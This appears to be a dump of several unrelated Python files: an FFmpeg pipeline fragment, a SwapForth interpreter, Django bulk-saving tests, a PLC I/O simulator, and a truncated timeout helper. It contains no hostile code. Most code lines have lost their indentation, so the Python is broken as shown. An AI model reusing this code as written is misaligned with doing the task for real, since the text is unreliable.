_filter.properties["converter"] = "json"
if "method" not in _filter.properties:
_filter.properties["method"] = "all"
if "source" in _filter.properties:
_filter.properties["source"] = "\'{}\'".format(
_filter.properties["source"]).replace('_COLON_', r'\:')
filter_components.append(
self._join_video_filter_properties(name, _filter.properties))
else:
filter_components.append(_filter.properties["_ORIG_"])
result.append(','.join(filter_components))
return result
def _generate_output(self, _output):
result = [_output.token, _output.format]
args = _output.properties.pop("_ARGS_")
args = [arg for arg in args if not arg.endswith("_ARG_")]
kafka_hosts = (_output.properties.pop("_METAPUBLISH_KAFKA_HOST_")
if "_METAPUBLISH_KAFKA_HOST_" in _output.properties else None)
kafka_topic = (_output.properties.pop("_METAPUBLISH_KAFKA_TOPIC_")
if "_METAPUBLISH_KAFKA_TOPIC_" in _output.properties else None)
if (kafka_hosts) and (kafka_topic):
args.extend(["kafka://{}/{}".format(host, kafka_topic)
for host in kafka_hosts.split(',')])
for option, value in _output.properties.items():
result.append("-{}".format(option)
if not option.startswith('-') else option)
result.append(value)
result.extend(args)
return result
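    # For reference (illustrative): with _METAPUBLISH_KAFKA_HOST_ set to
    # 'host1,host2' and _METAPUBLISH_KAFKA_TOPIC_ set to 'events', the
    # positional args are expanded to 'kafka://host1/events kafka://host2/events'.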
def _generate_ffmpeg_launch_args(self):
args_remaining = len(self._ffmpeg_args)
indices = [args_remaining - (x + 1)
for x in range(len(self._ffmpeg_args))]
result = []
generators = [(_input, self._generate_input)
for _input in self._inputs]
generators.extend([(_output, self._generate_output)
for _output in self._outputs])
generators.extend([(_video_filter, self._generate_video_filter)
for _video_filter in self._video_filters])
while(args_remaining):
index = indices[args_remaining - 1]
consumed = False
for token, generate in generators:
if (index == token.range[0]):
result.extend(generate(token))
args_remaining -= token.range[1] - token.range[0] + 1
consumed = True
generators.remove((token, generate))
break
if (not consumed):
result.append(self._ffmpeg_args[index])
args_remaining -= 1
self._ffmpeg_args = result
self._unescape_args(self._ffmpeg_args)
self._ffmpeg_args = [str(x) for x in self._ffmpeg_args]
def _set_real_base(self, metaconvert):
self._real_base = int(
time.clock_gettime(time.CLOCK_REALTIME) *
FFmpegPipeline.SECONDS_TO_NANOSECONDS)
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
properties = self._video_filter_map[metaconvert].properties
properties["tags"] = "\'{}\'".format(
json.dumps(self.request["tags"]).replace(':', r'\:'))
def _set_recording_prefix(self, segment):
self._recording_prefix = os.path.abspath(
self.request['parameters']['recording_prefix'])
self._temp_recording_dir = os.path.join(os.path.dirname(
self._recording_prefix), "tmp_recording/{}".format(self.identifier))
try:
shutil.rmtree(self._temp_recording_dir)
except OSError as exception:
self._logger.warning(str(exception))
try:
os.makedirs(self._temp_recording_dir)
except Exception as exception:
self._logger.warning(str(exception))
properties = self._output_format_map[segment].properties
properties['_ARGS_'] = [os.path.join(
self._temp_recording_dir, "temp_recording_%d.mp4")]
def _initialize_segment_recording(self):
segment_key = ("segment", 0)
if (segment_key in self._output_format_map):
metaconvert_key = ("metaconvert", 0)
if (metaconvert_key in self._video_filter_map):
self._set_real_base(metaconvert_key)
if (('parameters' in self.request)
and ('recording_prefix' in self.request['parameters'])):
self._set_recording_prefix(segment_key)
def start(self):
        with self._create_delete_lock:
if (self.start_time is not None):
return
self._logger.debug("Starting Pipeline %s", self.identifier)
self.request["models"] = self.models
self._escape_source()
self._ffmpeg_launch_string = string.Formatter().vformat(
self.template, [], self.request)
self._parse_ffmpeg_launch_string(self._ffmpeg_launch_string)
self._set_properties()
self._set_default_models()
self._set_model_proc()
self._initialize_segment_recording()
self._generate_ffmpeg_launch_args()
self._unescape_source()
thread = Thread(target=self._spawn, args=[self._ffmpeg_args])
self.start_time = time.time()
thread.start()
|
nuc.py
|
from __future__ import print_function
from __future__ import division
import sys
import getopt
import struct
from functools import partial
import operator
import array
import copy
import time
import re
if sys.version_info[0] < 3:
input = raw_input
sys.path.append("../shell")
import swapforth
def truth(pred):
return [0, -1][pred]
def setimmediate(func):
func.is_immediate = True
return func
def ba(x):
if type(x) == str:
return array.array('B', [ord(c) for c in x])
elif type(x) == bytes:
return array.array('B', x)
else:
return array.array('B', str(x))
class ForthException(Exception):
def __init__(self, value):
self.value = value
class SwapForth:
def __init__(self, CELL = 4, ENDIAN = '<'):
self.d = [] # data stack
self.r = [] # return stack
self.dict = {} # the dictionary
self.xts = [] # execution token (xt) table
self.ip = 0 # instruction pointer for inner interpreter
self.loopC = 0 # loop count
self.loopL = 0 # loop limit
self.leaves = [] # tracking LEAVEs from DO..LOOP
self.ram = array.array('B') # memory
self.out = sys.stdout.write # default console output
self.CELL = CELL
self.CSIGN = (256 ** self.CELL) >> 1 # Sign bit mask
self.CMASK = (256 ** self.CELL) - 1 # Cell mask
self.cellfmt = ENDIAN + {2: 'h', 4: 'i', 8: 'q'}[self.CELL]
def allot(n, d):
r = partial(self.lit, len(self.ram))
r.__doc__ = d
self.ram.extend([0] * n)
return r
self.tib = allot(256, "TIB")
self.sourcea = allot(self.CELL, "SOURCEA")
self.sourcec = allot(self.CELL, "SOURCEC")
self.sourceid = allot(self.CELL, "SOURCEID")
self.to_in = allot(self.CELL, ">IN")
self.base = allot(self.CELL, "BASE")
self.state = allot(self.CELL, "STATE")
# Run through own bound methods, adding each to the dict
isforth = re.compile(r"[A-Z0-9<>=\-\[\],@!:;+?/*]+$")
for name in dir(self):
o = getattr(self, name)
if not isforth.match(name) and o.__doc__:
# name was not a valid Forth name; try start of the docstring
name = o.__doc__.split()[0]
if callable(o) and isforth.match(name):
self.dict[name] = o
self.DECIMAL()
def u32(self, x):
return x & self.CMASK
def w32(self, x):
x += self.CSIGN
x &= self.CMASK
x -= self.CSIGN
return x
def lit(self, n):
""" push literal N on the stack """
self.d.append(n)
def popn(self, n):
r = self.d[-n:]
self.d = self.d[:-n]
return r
def q(self, s):
for w in s.split():
if w in self.dict:
self.dict[w]()
else:
self.lit(int(w))
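    # Illustration (not in the original): self.q('1 2 +') pushes 1 and 2, then
    # executes the '+' word, leaving 3 on top of the data stack.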
def binary(self, op):
b = self.d.pop()
self.d[-1] = self.w32(op(self.d[-1], b))
def dpop(self):
r = self.d.pop() << (8 * self.CELL)
r += self.d.pop() & self.CMASK
return r
def dlit(self, d):
self.lit(self.w32(d & self.CMASK))
self.lit(self.w32(d >> (8 * self.CELL)))
def pops(self):
n = self.d.pop()
a = self.d.pop()
return self.ram[a:a+n].tostring().decode("utf-8")
# Start of Forth words
#
# If the word is a legal Python identifier, then
# use that name. Otherwise (e.g. '+') the Forth name is in
# the docstring.
def HERE(self):
self.lit(len(self.ram))
def THROW(self):
e = self.d.pop()
if e:
raise ForthException(e)
def CATCH(self):
self.q('SOURCEA @ SOURCEC @ >IN @')
self.q('SOURCEID @ >R')
source_spec = self.popn(3)
(ds,rs,ip) = (len(self.d) - 1, len(self.r), self.ip)
try:
self.EXECUTE()
except ForthException as e:
if len(self.d) > ds:
self.d = self.d[:ds]
else:
self.d = self.d + [0] * (ds - len(self.d))
self.r = self.r[:rs]
self.ip = ip
self.lit(source_spec[0])
self.lit(source_spec[1])
self.lit(source_spec[2])
self.q('R> SOURCEID !')
self.q('>IN ! SOURCEC ! SOURCEA !')
self.lit(e.value)
else:
self.lit(0)
def cell_plus(self):
""" CELL+ """
self.d[-1] += self.CELL
def DEPTH(self):
self.lit(len(self.d))
def SOURCE(self):
self.sourcea()
self.fetch()
self.sourcec()
self.fetch()
def fetch(self):
""" @ """
a = self.d.pop()
self.lit(*struct.unpack(self.cellfmt, self.ram[a:a + self.CELL]))
def c_fetch(self):
""" C@ """
a = self.d.pop()
self.lit(self.ram[a])
def store(self):
""" ! """
a = self.d.pop()
x = self.d.pop()
self.ram[a:a + self.CELL] = array.array('B', struct.pack(self.cellfmt, x))
def c_store(self):
""" C! """
a = self.d.pop()
x = self.d.pop()
self.ram[a] = x & 0xff
def comma(self):
""" , """
self.ram.extend(ba(struct.pack(self.cellfmt, self.d.pop())))
def c_comma(self):
""" C, """
self.ram.extend([self.d.pop()])
def slash_string(self):
""" /STRING """
n = self.d.pop()
self.d[-2] += n
self.d[-1] -= n
def PARSE(self):
delim = self.d.pop()
self.q('SOURCE >IN @ /STRING')
self.q('OVER >R')
while True:
if self.d[-1] == 0:
break
if (self.ram[self.d[-2]]) == delim:
break
self.lit(1)
self.slash_string()
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def parse_name(self):
""" PARSE-NAME """
self.q('SOURCE >IN @ /STRING')
def skip(pred):
while True:
if self.d[-1] == 0:
break
if not pred(self.ram[self.d[-2]]):
break
self.lit(1)
self.slash_string()
skip(lambda x: x == 32)
self.q('OVER >R')
skip(lambda x: x != 32)
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def DUP(self):
self.d.append(self.d[-1])
def DROP(self):
self.d.pop()
def NIP(self):
self.d.pop(-2)
def two_drop(self):
""" 2DROP """
self.d.pop()
self.d.pop()
def SWAP(self):
(self.d[-2], self.d[-1]) = (self.d[-1], self.d[-2])
def two_swap(self):
""" 2SWAP """
(self.d[-4], self.d[-3], self.d[-2], self.d[-1]) = (self.d[-2], self.d[-1], self.d[-4], self.d[-3])
def two_over(self):
""" 2OVER """
self.lit(self.d[-4])
self.lit(self.d[-4])
def OVER(self):
self.lit(self.d[-2])
def TUCK(self):
self.SWAP()
self.OVER()
def two_dup(self):
""" 2DUP """
self.d += self.d[-2:]
def to_r(self):
""" >R """
self.r.append(self.d.pop())
def r_from(self):
""" R> """
self.d.append(self.r.pop())
def r_fetch(self):
""" R@ """
self.d.append(self.r[-1])
def n_to_r(self):
""" N>R """
n = self.d.pop()
if n:
self.r += self.d[-n:]
self.d = self.d[:-n]
self.r.append(n)
def n_r_from(self):
""" NR> """
n = self.r.pop()
if n:
self.d += self.r[-n:]
self.r = self.r[:-n]
self.lit(n)
def plus(self):
""" + """
self.binary(operator.__add__)
def minus(self):
""" - """
self.binary(operator.__sub__)
def _and(self):
""" AND """
self.binary(operator.__and__)
def _or(self):
""" OR """
self.binary(operator.__or__)
def _xor(self):
""" XOR """
self.binary(operator.__xor__)
def LSHIFT(self):
self.binary(operator.__lshift__)
def RSHIFT(self):
self.binary(lambda a, b: (a & self.CMASK) >> b)
def two_slash(self):
""" 2/ """
self.d[-1] >>= 1
def equal(self):
""" = """
self.binary(lambda a, b: truth(a == b))
def less_than(self):
""" < """
self.binary(lambda a, b: truth(a < b))
def u_less_than(self):
""" U< """
self.binary(lambda a, b: truth((a & self.CMASK) < (b & self.CMASK)))
def NEGATE(self):
self.d[-1] = self.w32(-self.d[-1])
def INVERT(self):
self.d[-1] = self.w32(self.d[-1] ^ self.CMASK)
def MIN(self):
self.lit(min(self.d.pop(), self.d.pop()))
def MAX(self):
self.lit(max(self.d.pop(), self.d.pop()))
def dplus(self):
""" D+ """
self.dlit(self.dpop() + self.dpop())
def u_m_star(self):
""" UM* """
self.dlit(self.u32(self.d.pop()) * self.u32(self.d.pop()))
def star(self):
""" * """
self.binary(operator.__mul__)
def u_m_slash_mod(self):
""" UM/MOD """
u1 = self.u32(self.d.pop())
ud = self.dpop() & (65536**self.CELL - 1)
self.lit(self.w32(ud % u1))
self.lit(self.w32(ud // u1))
def MS(self):
time.sleep(0.001 * self.d.pop())
def EMIT(self):
self.out(chr(self.d.pop()))
def CR(self):
self.lit(ord('\n'))
self.EMIT()
def SPACE(self):
self.lit(ord(' '))
self.EMIT()
def BL(self):
self.lit(ord(' '))
def WORDS(self):
self.out(" ".join(self.dict))
def xt(self, c):
if not c in self.xts:
self.xts.append(c)
return self.xts.index(c) + 1000
def SFIND(self):
(a, n) = self.d[-2:]
s = self.ram[a:a+n].tostring().decode("utf-8").upper()
# print('HERE', s.decode("utf-8"), self.dict)
if s in self.dict:
x = self.dict[s]
self.d[-2] = self.xt(x)
if hasattr(x, 'is_immediate'):
self.d[-1] = 1
else:
self.d[-1] = -1
else:
self.lit(0)
def EXECUTE(self):
x = self.d.pop()
self.xts[x - 1000]()
@setimmediate
def left_paren(self):
""" [ """
self.lit(0)
self.state()
self.store()
def right_paren(self):
""" ] """
self.lit(1)
self.state()
self.store()
def inner(self, code):
save = self.ip
self.ip = 0
while self.ip < len(code):
c = code[self.ip]
self.ip += 1
c()
self.ip = save
def MARKER(self):
self.parse_name()
name = self.pops().upper()
def restore(here, dict):
del self.ram[here:]
self.dict = dict
self.dict[name] = partial(restore, len(self.ram), copy.copy(self.dict))
def mkheader(self):
self.parse_name()
self.code = []
self.defining = self.pops().upper()
def colon(self):
""" : """
self.mkheader()
self.right_paren()
def endcolon():
self.lastword = partial(self.inner, self.code)
if self.defining in self.dict:
                print('warning: redefining %s' % self.defining)
self.dict[self.defining] = self.lastword
self.dosemi = endcolon
@setimmediate
def semicolon(self):
""" ; """
self.dosemi()
self.left_paren()
@setimmediate
def RECURSE(self):
self.code.append(partial(self.inner, self.code))
def noname(self):
""" :NONAME """
self.code = []
self.right_paren()
def endnoname():
self.lit(self.xt(partial(self.inner, self.code)))
self.dosemi = endnoname
def IMMEDIATE(self):
setattr(self.lastword, 'is_immediate', True)
@setimmediate
def does(self):
""" DOES> """
def dodoes(code):
del self.code[1:]
self.code.append(partial(self.inner, code))
dobody = []
self.code.append(partial(dodoes, dobody))
self.semicolon()
self.right_paren()
self.code = dobody
self.dosemi = lambda: 0
def to_body(self):
""" >BODY """
code = self.xts[self.d.pop() - 1000].args[0]
code0 = code[0]
self.inner([code0])
def ALLOT(self):
self.ram.extend(ba(chr(0) * self.d.pop()))
@setimmediate
def POSTPONE(self):
self.parse_name()
self.SFIND()
if self.d[-1] == 0:
self.DROP()
assert 0, "Bad postpone %s" % self.pops()
if self.d.pop() < 0:
self.LITERAL()
self.lit(self.xt(self.compile_comma))
self.compile_comma()
def EXIT(self):
        self.ip = 99999999
def ACCEPT(self):
(a, n) = self.popn(2)
s = input()[:n]
ns = len(s)
        self.ram[a:a + ns] = ba(s)
self.lit(ns)
def to_number(self, base = None):
""" >NUMBER """
if base is None:
self.base()
self.fetch()
base = self.d.pop()
(a, n) = self.popn(2)
ud2 = self.dpop()
try:
while n:
ud2 = base * ud2 + int(chr(self.ram[a]), base)
a += 1
n -= 1
except ValueError:
pass
self.dlit(ud2)
self.lit(a)
self.lit(n)
def DECIMAL(self):
self.lit(10)
self.base()
self.store()
def compile_comma(self):
""" COMPILE, """
self.code.append(self.xts[self.d.pop() - 1000])
def branch(self, x):
self.ip = x
def zbranch(self, x):
if self.d.pop() == 0:
self.ip = x
@setimmediate
def BEGIN(self):
self.lit(len(self.code))
@setimmediate
def AGAIN(self):
self.code.append(partial(self.branch, self.d.pop()))
@setimmediate
def AHEAD(self):
self.lit(len(self.code))
self.code.append(self.branch)
@setimmediate
def m_if(self):
""" IF """
self.lit(len(self.code))
self.code.append(self.zbranch)
@setimmediate
def THEN(self):
p = self.d.pop()
self.code[p] = partial(self.code[p], len(self.code))
@setimmediate
def UNTIL(self):
self.code.append(partial(self.zbranch, self.d.pop()))
@setimmediate
def LITERAL(self):
self.code.append(partial(self.lit, self.d.pop()))
def dodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d.pop()
self.loopL = self.d.pop()
def qdodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d[-1]
self.loopL = self.d[-2]
self._xor()
def doloop(self):
before = self.w32(self.loopC - self.loopL) < 0
inc = self.d.pop()
self.loopC = self.w32(self.loopC + inc)
after = self.w32(self.loopC - self.loopL) < 0
if inc > 0:
finish = before > after
else:
finish = before < after
self.lit(finish)
@setimmediate
def DO(self):
self.leaves.append([])
self.code.append(self.dodo)
self.lit(len(self.code))
@setimmediate
def LOOP(self):
self.lit(1)
self.LITERAL()
self.plus_loop()
@setimmediate
def plus_loop(self):
""" +LOOP """
self.code.append(self.doloop)
self.UNTIL()
leaves = self.leaves.pop()
for p in leaves:
self.code[p] = partial(self.code[p], len(self.code))
self.code.append(self.UNLOOP)
@setimmediate
def question_do(self):
""" ?DO """
self.code.append(self.qdodo)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.lit(len(self.code))
return
self.code.append(self.two_dup)
self.code.append(self.equal)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.code.append(self.dodo)
self.lit(len(self.code))
def I(self):
self.lit(self.loopC)
def J(self):
self.lit(self.r[-2])
def UNLOOP(self):
self.loopL = self.r.pop()
self.loopC = self.r.pop()
def QUIT(self):
print('QUIT')
raise swapforth.Bye
@setimmediate
def LEAVE(self):
self.leaves[-1].append(len(self.code))
self.code.append(self.branch)
def EVALUATE(self):
self.q('SOURCE >R >R >IN @ >R')
self.q('SOURCEID @ >R -1 SOURCEID !')
self.q('SOURCEC ! SOURCEA ! 0 >IN !')
self.interpret()
self.q('R> SOURCEID !')
self.q('R> >IN ! R> SOURCEA ! R> SOURCEC !')
def source_id(self):
""" SOURCE-ID """
self.q('SOURCEID @')
def interpret(self):
def consume1(c):
if self.d[-1] != 0:
r = self.ram[self.d[-2]] == c
else:
r = 0
if r:
self.lit(1)
self.slash_string()
return r
def da():
self.two_dup()
was = self.pops()
if len(was) == 3 and was[0] == "'" and was[2] == "'":
self.two_drop()
self.lit(ord(was[1]))
self.lit(1)
return
self.dlit(0)
self.two_swap()
if consume1(ord('$')):
base = 16
elif consume1(ord('#')):
base = 10
elif consume1(ord('%')):
base = 2
else:
base = None
neg = consume1(ord('-'))
self.to_number(base)
double = consume1(ord('.'))
if self.d.pop() != 0:
self.lit(-13)
self.THROW()
self.DROP()
if double:
if neg:
self.q('DNEGATE')
self.lit(2)
else:
self.DROP()
if neg:
self.NEGATE()
self.lit(1)
def doubleAlso():
da()
self.DROP()
def doubleAlso_comma():
da()
if self.d.pop() == 2:
self.SWAP()
self.LITERAL()
self.LITERAL()
while True:
self.parse_name()
if self.d[-1] == 0:
break
self.SFIND()
i = self.d.pop() + 1
self.state()
self.fetch()
i += 3 * self.d.pop()
[ # nonimmediate number immediate
# ------------ ------ ---------
self.EXECUTE, doubleAlso, self.EXECUTE, # interpretation
self.compile_comma, doubleAlso_comma, self.EXECUTE # compilation
][i]()
self.two_drop()
def REFILL(self):
self.q('SOURCEID @')
if self.d.pop() == 0:
self.tib()
self.lit(256)
self.ACCEPT()
self.q('SOURCEC !')
self.q('TIB SOURCEA !')
self.q('0 >IN !')
self.lit(-1)
else:
self.lit(0)
def putcmd(self, cmd):
if cmd.endswith('\r'):
cmd = cmd[:-1]
self.tib()
tib = self.d.pop()
for i,c in enumerate(cmd):
self.ram[tib + i] = ord(c)
self.q('TIB SOURCEA !')
self.lit(len(cmd))
self.q('SOURCEC !')
self.q('0 >IN !')
import threading
try:
import queue
except ImportError:
import Queue as queue
class AsyncSwapForth(SwapForth):
def __init__(self, cmdq, ready, *options):
SwapForth.__init__(self, *options)
self.cmdq = cmdq
self.ready = ready
while True:
self.REFILL()
if not self.d.pop():
assert 0, "REFILL failed"
self.lit(self.xt(self.interpret))
self.CATCH()
e = self.d.pop()
if e:
codes = {
-1 : ": aborted",
-4 : ": stack underflow",
-9 : ": invalid memory address",
-13 : ": undefined word",
-14 : ": interpreting a compile-only word",
-28 : ": user interrupt"}
self.out('error: %d%s\n' % (e, codes.get(e, "")))
else:
self.out(' ok\r\n')
def ACCEPT(self):
(a, n) = self.popn(2)
self.ready.set()
        (self.out, s) = self.cmdq.get()
        s = s[:n]
ns = len(s)
self.ram[a:a + ns] = ba(s)
self.lit(ns)
class Tethered(swapforth.TetheredTarget):
def __init__(self, *options):
self.searchpath = ['.']
self.log = open("log", "w")
self.ser = None
self.verbose = False
self.interpreting = False
self.ready = threading.Event()
self.cmdq = queue.Queue()
self.t = threading.Thread(target = AsyncSwapForth, args = (self.cmdq, self.ready) + options)
        self.t.daemon = True
self.t.start()
self.ready.wait()
def issue(self, writer, cmd):
assert self.ready.is_set()
self.ready.clear()
self.cmdq.put((writer, cmd))
self.ready.wait()
def interactive_command(self, cmd):
self.issue(sys.stdout.write, cmd)
def command_response(self, cmd):
r = []
self.issue(lambda c: r.append(c), cmd)
return "".join(r)
if __name__ == '__main__':
cellsize = 4
endian = '<'
try:
options,args = getopt.getopt(sys.argv[1:], 'c:b')
optdict = dict(options)
if '-c' in optdict:
cellsize = int(optdict['-c'])
if '-b' in optdict:
endian = '>'
except getopt.GetoptError:
print("usage:")
print(" -c N cell size, one of 2,4 or 8")
print(" -b big-endian. Default is little-endian")
sys.exit(1)
dpans = {}
allw = set()
t = Tethered(cellsize, endian)
t.searchpath += ['../anstests', '../common']
# print set(t.sf.dict.keys()) - dpans['CORE']
try:
t.include('swapforth.fs')
[t.include(a) for a in args]
except swapforth.Bye:
pass
if 0:
words = set(t.command_response('words').split())
missing = dpans['CORE'] - words
print(len(missing), "MISSING CORE", " ".join(sorted(missing)))
print(words - allw)
t.shell()
|
tests.py
|
from itertools import cycle
from threading import Thread
import queue
from django.test import TestCase
from bulk_saving.models import BulkSavableModel
from testapp.models import (
Bulky,
Foreign
)
class BulkSavableModelTestCase(TestCase):
def test_bulk_create_and_update(self):
foreign1 = Foreign.objects.create(name='John')
foreign2 = Foreign.objects.create(name='Steve')
foreigns = cycle([foreign1, foreign2])
bulky_count = 1000
bulk_chunk_size = 100
        with self.assertNumQueries(bulky_count // bulk_chunk_size):
with Bulky.bulk_saving(chunk_size=bulk_chunk_size):
for _ in range(bulky_count):
Bulky(field='a', foreign=next(foreigns)).save_later()
bulkies = list(Bulky.objects.all())
self.assertEqual(len(bulkies), bulky_count)
        with self.assertNumQueries(bulky_count // bulk_chunk_size):
with Bulky.bulk_saving(chunk_size=bulk_chunk_size):
for bulky in bulkies:
bulky.field = 'b'
bulky.save_later(update_fields=['field'])
self.assertEqual(Bulky.objects.count(), bulky_count) # no new bulkies should be created
self.assertEqual(Bulky.objects.filter(field='b').count(), bulky_count) # all bulkies should be updated
def test_bulk_updating_foreign_key(self):
foreign1 = Foreign.objects.create(name='John')
foreign2 = Foreign.objects.create(name='Steve')
bulky_count = 10
with Bulky.bulk_saving():
for _ in range(bulky_count):
Bulky(field='a', foreign=foreign1).save_later()
bulkies = Bulky.objects.all()
with Bulky.bulk_saving():
for bulky in bulkies:
bulky.foreign = foreign2
bulky.save_later()
self.assertEqual(Bulky.objects.filter(foreign=foreign2).count(), bulky_count) # all bulkies should be updated
def test_updating_foreign_key_to_none(self):
foreign = Foreign.objects.create(name='John')
bulky = Bulky.objects.create(field='a', foreign=foreign)
with Bulky.bulk_saving():
bulky.foreign = None
bulky.save_later()
self.assertEqual(Bulky.objects.get(pk=bulky.pk).foreign, None)
def test_thread_local(self):
q = queue.Queue()
def test_thread():
instance = BulkSavableModel()
q.put(hasattr(instance.bulk_save, 'enabled'))
thread = Thread(target=test_thread)
thread.start()
self.assertTrue(q.get())
thread = Thread(target=test_thread)
thread.start()
self.assertTrue(q.get())
|
IoManager.py
|
###############################################################################
# Project: PLC Simulator
# Purpose: Class to encapsulate the IO manager functionality
# Author: Paul M. Breen
# Date: 2018-07-17
###############################################################################
import logging
import threading
import time
import math
import random
class IoManager(object):
DEFAULTS = {
'byteorder': 'big',
'wave': {
'types': ['sin','sine','cos','cosine','sawtooth','square'],
'resolution': 1e3
},
'range': { # N.B.: stop is calculated from word length
'types': ['counter','randrange'],
'start': 0,
'step': 1
},
'random': {
'types': ['randrange','lognormal','uniform'],
'resolution': 1e3,
'lognormal': {'mu': 0, 'sigma': 1},
'uniform': {'a': 0, 'b': 1}
}
}
def __init__(self, conf, memory_manager=None):
self.conf = conf
self.memory_manager = memory_manager
def init_io(self):
for conf in self.conf['simulations']:
id = self.define_id(conf)
logging.info('Starting simulation {}'.format(id))
# N.B.: args expects a tuple, hence the trailing comma. Setting
# the thread's daemon status to True, ensures that the thread will
# terminate when the application main thread is terminated
simulation = threading.Thread(target=self.run_simulation, args=(conf,))
simulation.daemon = True
simulation.start()
def define_id(self, conf):
id = ''
try:
id = conf['id']
except KeyError:
pass
if not id:
# Generate an ID for this simulation from its configuration
mem_id = ':'.join([str(x) for x in conf['memspace'].values()])
func_id = ':'.join([str(x) for x in conf['function'].values()])
id = ':'.join([mem_id, func_id])
conf['id'] = id
return id
def define_range(self, conf):
range_params = []
wlen = self.memory_manager.get_section_word_len(conf['memspace']['section'])
start = self.DEFAULTS['range']['start']
stop = 2**(wlen * 8)
step = self.DEFAULTS['range']['step']
try:
range_params = conf['function']['range']
except KeyError:
pass
if len(range_params) == 0:
range_params = [start, stop, step]
elif len(range_params) == 1: # Only stop given
range_params.append(range_params[0])
range_params[0] = start
range_params.append(step)
elif len(range_params) == 2:
if range_params[1] < range_params[0]: # Decrementing range
range_params.append(-step)
else:
range_params.append(step)
conf['function']['range'] = range_params
return range_params
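    # For reference (illustrative): define_range above expands range [500] to
    # [0, 500, 1], range [10, 0] to [10, 0, -1], and an empty range to
    # [0, 2**(word_length_in_bytes * 8), 1].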
def define_parameter(self, name, conf, default):
param = default[name]
try:
param = conf[name]
except KeyError:
pass
return param
def run_simulation(self, conf):
sources = {
'counter': 0
}
self.init_simulation(conf, sources)
while True:
data = self.simulate_data(conf, sources)
if data is not None:
self.memory_manager.set_data(**conf['memspace'], data=data)
try:
time.sleep(conf['pause'])
except KeyError:
pass
def init_simulation(self, conf, sources):
# If constrained to a range, ensure the range is fully specified and
# that the sources are suitably initialised
if conf['function']['type'] in self.DEFAULTS['range']['types']:
self.define_range(conf)
sources['counter'] = conf['function']['range'][0]
if conf['function']['type'] in self.DEFAULTS['random']['types']:
try:
random.seed(a=conf['function']['seed'])
except KeyError:
pass
# Fallback to default parameters if not specified in configuration
if conf['function']['type'] == 'lognormal':
conf['function']['mu'] = self.define_parameter('mu', conf['function'], self.DEFAULTS['random']['lognormal'])
conf['function']['sigma'] = self.define_parameter('sigma', conf['function'], self.DEFAULTS['random']['lognormal'])
elif conf['function']['type'] == 'uniform':
conf['function']['a'] = self.define_parameter('a', conf['function'], self.DEFAULTS['random']['uniform'])
conf['function']['b'] = self.define_parameter('b', conf['function'], self.DEFAULTS['random']['uniform'])
def simulate_data(self, conf, sources):
data = bytearray(0)
wlen = self.memory_manager.get_section_word_len(conf['memspace']['section'])
nwords = int(conf['memspace']['nwords'])
if conf['function']['type'] == 'counter':
value = sources['counter']
sources['counter'] = self.get_next_range_value(conf['function']['range'], value)
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] == 'binary':
value = sources['counter']
sources['counter'] = (value + 1) % 2
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] == 'static':
value = int(conf['function']['value'])
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] in self.DEFAULTS['wave']['types']:
res = int(self.DEFAULTS['wave']['resolution'])
value = sources['counter']
sources['counter'] = (value + 1) % (2 * res + 1)
if conf['function']['type'] in ['sin','sine']:
y = int(math.sin((value / res) * math.pi) * res + res)
elif conf['function']['type'] in ['cos','cosine']:
y = int(math.cos((value / res) * math.pi) * res + res)
elif conf['function']['type'] == 'sawtooth':
y = value
elif conf['function']['type'] == 'square':
w = math.sin((value / res) * math.pi)
y = res if w < 0.0 else 2 * res
data = self.value_to_bytes(y, nwords, wlen)
elif conf['function']['type'] == 'randrange':
value = random.randrange(*conf['function']['range'])
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] in self.DEFAULTS['random']['types']:
res = int(self.DEFAULTS['random']['resolution'])
if conf['function']['type'] == 'lognormal':
w = random.lognormvariate(conf['function']['mu'], conf['function']['sigma'])
y = int(w * res) % 2**(wlen * 8) # Avoid OverflowError
elif conf['function']['type'] == 'uniform':
w = random.uniform(conf['function']['a'], conf['function']['b'])
y = int(w * res)
data = self.value_to_bytes(y, nwords, wlen)
elif conf['function']['type'] == 'copy':
data = self.memory_manager.get_data(**conf['source']['memspace'])
elif conf['function']['type'] == 'transform':
buf = self.memory_manager.get_data(**conf['source']['memspace'])
word = int.from_bytes(buf, byteorder=self.DEFAULTS['byteorder'])
value = self.transform_item(word, conf['function']['transform'])
if value is not None:
data = self.value_to_bytes(value, nwords, wlen)
else:
data = None
return data
def value_to_bytes(self, value, nwords, wlen):
data = bytearray(0)
b = value.to_bytes(wlen, byteorder=self.DEFAULTS['byteorder'])
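# Repeat the word's byte encoding nwords times so every word in the target
# region carries the same value.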
for i in range(nwords):
data += b
return data
def get_next_range_value(self, range_params, value):
next_value = value + range_params[2]
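# Wrap back to the start once the (exclusive) stop value is reached, in
# either direction; this mirrors range()-style semantics.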
if range_params[2] < 0:
if next_value <= range_params[1]:
next_value = range_params[0]
else:
if next_value >= range_params[1]:
next_value = range_params[0]
return next_value
def transform_item(self, state, transform):
item = None
t_in = transform['in']
t_out = transform['out']
# If the transform output is configured as 'null', then it takes the
# value of the state variable
if t_out is None:
t_out = state
if isinstance(t_in, (list, tuple)):
if t_in[0] <= state <= t_in[1]:
item = t_out
elif state == t_in:
item = t_out
return item
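# Illustrative configuration sketch (hypothetical values; only 'section' and
# 'nwords' are read directly above, the remaining memspace fields depend on
# the memory manager's get_data/set_data signatures):
#
#     conf = {
#         'memspace': {'section': 'holding_registers', 'nwords': 1},
#         'source': {'memspace': {'section': 'input_registers', 'nwords': 1}},
#         'function': {'type': 'transform', 'transform': {'in': [0, 9], 'out': None}},
#         'pause': 1.0,
#     }
#
# With 'out' set to None (JSON null), the transform echoes the source word
# whenever it falls inside the inclusive 'in' interval; otherwise no data is
# written for that cycle.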
|
timeout.py
|
from multiprocessing import Process, Pipe
class Timeout:
def __init__(self, func, timeout):
self.func = func
self.timeout = timeout
def __call__(self, *args, **kargs):
def pmain(pipe, func, args, kargs):
result = None
try:
result = func(*args, **kargs)
except Exception:
pass
